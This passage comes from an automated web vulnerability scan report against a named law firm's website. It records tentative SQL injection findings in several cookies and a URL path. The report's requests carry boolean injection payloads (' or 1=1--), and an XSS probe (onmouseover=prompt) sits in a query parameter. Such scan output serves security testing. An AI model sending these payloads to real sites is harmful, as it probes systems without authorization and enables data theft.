Content-Type: text/html; charset=UTF-8

Request 2

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)16707661'%20or%201%3d2--%20; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.6.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:06:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Email Disclaimer</title>
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<style type="text/css">
<!--
body,td,th {
   font-family: Verdana, Arial, Helvetica, sans-serif;
   color: #000000;
   line-height: 1.4em;
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin: 20px;
}

-->
</style>
</head>

<body>
<table width="460" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td valign="top" style="padding: 20px; text-align:justify;">
<p>We value your interest in Curtis, Mallet-Prevost, Colt & Mosle LLP and any communications prompted by your viewing of our website. It is important to us that you understand that transmitting information to us by e-mail does not establish any attorney-client or confidential relationship with us. An attorney-client relationship, and an obligation for the Firm to maintain your communications in confidence, can be created only after proper checks for potential conflicts with current clients are conducted and an agreement of representation is reached. Any information provided to us without such a prior agreement may waive legal privileges that you might otherwise have. In addition, in the absence of such an agreement, the Firm will be entitled to utilize such information on behalf of existing or future clients who may be adverse to your interests. For that reason, please refrain from sending the Firm confidential information through e-mail. Thank you for your interest in Cu
...[SNIP]...

1.20. http://www.curtis.com/emaildisclaimer.cfm [sifrFetch cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /emaildisclaimer.cfm

Issue detail

The sifrFetch cookie appears to be vulnerable to SQL injection attacks. The payloads 12161945'%20or%201%3d1--%20 and 12161945'%20or%201%3d2--%20 were each submitted in the sifrFetch cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true12161945'%20or%201%3d1--%20; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.6.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:06:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: SIFRFETCH=;expires=Sun, 18-Apr-2010 17:06:07 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true12161945'%20or%201%3d2--%20; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.6.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:06:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Email Disclaimer</title>
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<style type="text/css">
<!--
body,td,th {
   font-family: Verdana, Arial, Helvetica, sans-serif;
   color: #000000;
   line-height: 1.4em;
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin: 20px;
}

-->
</style>
</head>

<body>
<table width="460" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td valign="top" style="padding: 20px; text-align:justify;">
<p>We value your interest in Curtis, Mallet-Prevost, Colt & Mosle LLP and any communications prompted by your viewing of our website. It is important to us that you understand that transmitting information to us by e-mail does not establish any attorney-client or confidential relationship with us. An attorney-client relationship, and an obligation for the Firm to maintain your communications in confidence, can be created only after proper checks for potential conflicts with current clients are conducted and an agreement of representation is reached. Any information provided to us without such a prior agreement may waive legal privileges that you might otherwise have. In addition, in the absence of such an agreement, the Firm will be entitled to utilize such information on behalf of existing or future clients who may be adverse to your interests. For that reason, please refrain from sending the Firm confidential information through e-mail. Thank you for your interest in Cu
...[SNIP]...

1.21. http://www.curtis.com/favicon.ico [CFID cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /favicon.ico

Issue detail

The CFID cookie appears to be vulnerable to SQL injection attacks. The payloads 61658724%20or%201%3d1--%20 and 61658724%20or%201%3d2--%20 were each submitted in the CFID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=617584361658724%20or%201%3d1--%20; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:00:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=;expires=Sun, 18-Apr-2010 17:00:51 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=617584361658724%20or%201%3d2--%20; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:00:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175919;path=/
Set-Cookie: CFTOKEN=56500703;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.v
...[SNIP]...

1.22. http://www.curtis.com/favicon.ico [CFTOKEN cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /favicon.ico

Issue detail

The CFTOKEN cookie appears to be vulnerable to SQL injection attacks. The payloads 57319298%20or%201%3d1--%20 and 57319298%20or%201%3d2--%20 were each submitted in the CFTOKEN cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=3257569757319298%20or%201%3d1--%20; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:01:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFTOKEN=;expires=Sun, 18-Apr-2010 17:01:01 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=3257569757319298%20or%201%3d2--%20; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175943;path=/
Set-Cookie: CFTOKEN=60929706;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.v
...[SNIP]...

1.23. http://www.curtis.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 67004861'%20or%201%3d1--%20 and 67004861'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico67004861'%20or%201%3d1--%20 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearc
...[SNIP]...

Request 2

GET /favicon.ico67004861'%20or%201%3d2--%20 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearch"].firstlastname.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin-left: 0px;
   margin-top: 10px;
   margin-right: 0px;
   margin-bottom: 10px;
}
--
...[SNIP]...

1.24. http://www.curtis.com/favicon.ico [__utma cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /favicon.ico

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. The payloads 11177873'%20or%201%3d1--%20 and 11177873'%20or%201%3d2--%20 were each submitted in the __utma cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.111177873'%20or%201%3d1--%20; __utmc=126702367; __utmb=126702367.4.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:01:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMA=;expires=Sun, 18-Apr-2010 17:01:02 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.111177873'%20or%201%3d2--%20; __utmc=126702367; __utmb=126702367.4.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.v
...[SNIP]...

1.25. http://www.curtis.com/favicon.ico [__utmb cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /favicon.ico

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. The payloads 20486949'%20or%201%3d1--%20 and 20486949'%20or%201%3d2--%20 were each submitted in the __utmb cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.4.10.130314580320486949'%20or%201%3d1--%20; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:01:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMB=;expires=Sun, 18-Apr-2010 17:01:20 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.4.10.130314580320486949'%20or%201%3d2--%20; CFID=6175843; CFTOKEN=32575697

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

